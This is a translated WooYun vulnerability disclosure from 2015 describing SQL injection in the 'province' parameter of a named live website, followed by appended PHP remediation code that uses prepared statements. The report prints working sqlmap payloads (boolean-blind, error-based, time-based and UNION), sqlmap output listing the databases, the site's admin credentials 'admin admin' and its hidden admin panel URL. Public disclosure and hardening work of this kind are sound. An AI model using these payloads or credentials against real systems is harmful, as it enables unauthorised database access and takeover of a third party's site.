
Vulnerability summary

Defect ID: wooyun-2015-0160722

Title: SQL injection on an Aili main site

Vendor: aili.com

Author: 头晕脑壳疼

Submitted: 2015-12-14 12:02

Fix time: 2015-12-19 12:04

Published: 2015-12-19 12:04

Type: SQL injection

Severity: High

Self-assessed rank: 10

Status: vendor notified, but the vendor ignored the vulnerability

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-12-14: Details sent to the vendor, awaiting vendor action
2015-12-19: Vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

Detailed description:

Don't ask me how I know this site belongs to Aili.
Related report: WooYun: 爱丽网某主站点SQL注入一枚(可执行命令) (Aili main site SQL injection, command execution possible)
Injection point: http://www.wenji99.com/?m=shop&id=&province=
---
Parameter: province (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: m=shop&id=&province=-6438' OR 9050=9050#
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload: m=shop&id=&province=-1562' OR 1 GROUP BY CONCAT(0x716b766a71,(SELECT (CASE WHEN (6049=6049) THEN 1 ELSE 0 END)),0x7170626a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
Payload: m=shop&id=&province=' AND (SELECT * FROM (SELECT(SLEEP(5)))Tlyb)#
Type: UNION query
Title: MySQL UNION query (NULL) - 12 columns
Payload: m=shop&id=&province=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b766a71,0x68474279457668497174,0x7170626a71)#
---
[14:04:41] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.3, Nginx
back-end DBMS: MySQL 5.0.12
[14:04:41] [INFO] fetching database names
available databases [3]:
[*] information_schema
[*] mysql
[*] wenji
[14:04:41] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.wenji99.com'
More than five hundred tables:
Database: wenji
[597 tables]

1.png


The admin password is still a weak one:

admin admin
http://www.wenji99.com/dlq9J15DshW5f/index.php


2.png

3.png


Proof of vulnerability: (identical to the detailed description above)



Remediation:
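The report leaves the remediation section empty. As an added illustration (not code from the report or from the affected site, and written for PHP 7.4+ rather than the PHP 5.3.3 the scan reports), the snippet below shows the string-concatenation pattern that produces a finding like the one above on the province GET parameter, next to a hardened handler that validates the parameter's shape and binds it through a PDO prepared statement. The table name mb_shop appears in the dump above; its columns, the connection details and the app_user account are assumptions.

```php
<?php
// Added example, not the site's code. Assumes a table `mb_shop` with
// columns `id`, `name` and `province` (table name is in the dump above,
// the columns are assumed).

// --- Vulnerable pattern: how a finding like the one above arises ---
// The GET value is spliced into the SQL text, so a single quote in
// ?province= closes the literal and the remainder is parsed as SQL.
function listShopsUnsafe(mysqli $db, string $province)
{
    $sql = "SELECT id, name FROM mb_shop WHERE province = '" . $province . "'";
    return $db->query($sql);
}

// --- Hardened handler ---
// 1. Reject values that do not look like a province name at all.
// 2. Send the value as a bound parameter; it never becomes SQL text.
function listShopsSafe(PDO $db, string $province): array
{
    // Province names: 1 to 20 letters (Latin or CJK), nothing else.
    if (!preg_match('/^\p{L}{1,20}$/u', $province)) {
        throw new InvalidArgumentException('invalid province');
    }
    $stmt = $db->prepare('SELECT id, name FROM mb_shop WHERE province = :province');
    $stmt->bindValue(':province', $province, PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Numeric parameters such as ?id= get the same treatment: validate as an
// integer first, then bind with PDO::PARAM_INT (the report leaves id empty).
function parseShopId($raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Emulated prepares off, so MySQL itself binds the parameters server-side.
// Credentials are placeholders.
$db = new PDO(
    'mysql:host=localhost;dbname=wenji;charset=utf8mb4',
    'app_user',
    'REPLACE_ME',
    [
        PDO::ATTR_EMULATE_PREPARES => false,
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    ]
);

// Never echo database errors to the client: the error-based payload in the
// scan above only works when query errors are reflected in the response.
ini_set('display_errors', '0');

try {
    $rows = listShopsSafe($db, $_GET['province'] ?? '');
    header('Content-Type: application/json');
    echo json_encode($rows);
} catch (InvalidArgumentException $e) {
    http_response_code(400);
    echo 'bad request';
} catch (PDOException $e) {
    error_log($e->getMessage());   // log server-side only
    http_response_code(500);
    echo 'internal error';
}
```

The admin/admin credential noted above is a separate finding and is not addressed by this code; it needs a password change and an account lockout policy on the admin login.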

Copyright notice: please credit the source when reposting: 头晕脑壳疼@乌云


Vendor response

Vendor response:

Severity: no impact, vendor ignored

Ignored at: 2015-12-19 12:04

Vendor reply:

Vulnerability rank: 4 (WooYun rating)

Latest status:

None yet

